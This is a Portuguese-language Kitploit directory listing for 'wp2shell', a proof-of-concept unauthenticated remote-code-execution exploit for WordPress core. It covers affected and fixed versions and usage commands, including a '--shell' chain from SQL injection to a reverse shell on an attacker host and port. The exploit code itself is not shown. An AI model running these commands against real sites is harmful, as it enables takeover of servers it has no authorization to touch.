Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-63030 — PoC Exploit do WordPress Core Unauthenticated RCE conhecido como WP2Shell | Kitploit
Ferramentas/GitHubGitHub/mverschu/cve-2026-63030
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubmverschu/cve-2026-63030

CVE-2026-63030

PoC Exploit do WordPress Core Unauthenticated RCE conhecido como WP2Shell

Ver Repositório
4111há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

wp2shell (CVE-2026-63030 / CVE-2026-60137)

Nomewp2shell
CVEsCVE-2026-63030 (dessincronização de lote), CVE-2026-60137 (author__not_in SQLi)
AtingidoWordPress 6.9.0 a 6.9.4, 7.0.0 a 7.0.1
Corrigido em6.9.5, 7.0.2
AutenticaçãoNenhuma
Descoberto porAdam Kues (Searchlight Cyber / Assetnote)

Uso

Host simples = esquema automático (tenta https:// depois http://). Prefixe com http:// ou https:// apenas quando quiser forçar um.

root@kitploit:~
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080

# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/

# timing confirm
wp2shell target.example --confirm-sqli

# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443
FlagO que faz
--shell [LHOST [LPORT]]cadeia RCE padrão; LHOST padrão é o IP desta máquina, LPORT é 443
--rest-routetente /?rest_route=/batch/v1 primeiro
--verify-tlsverificar certificados TLS (desligado por padrão para laboratório/autoassinado)
--proxy URLenviar tráfego através de um proxy
--forcepular a identificação de WordPress
Baixar ferramenta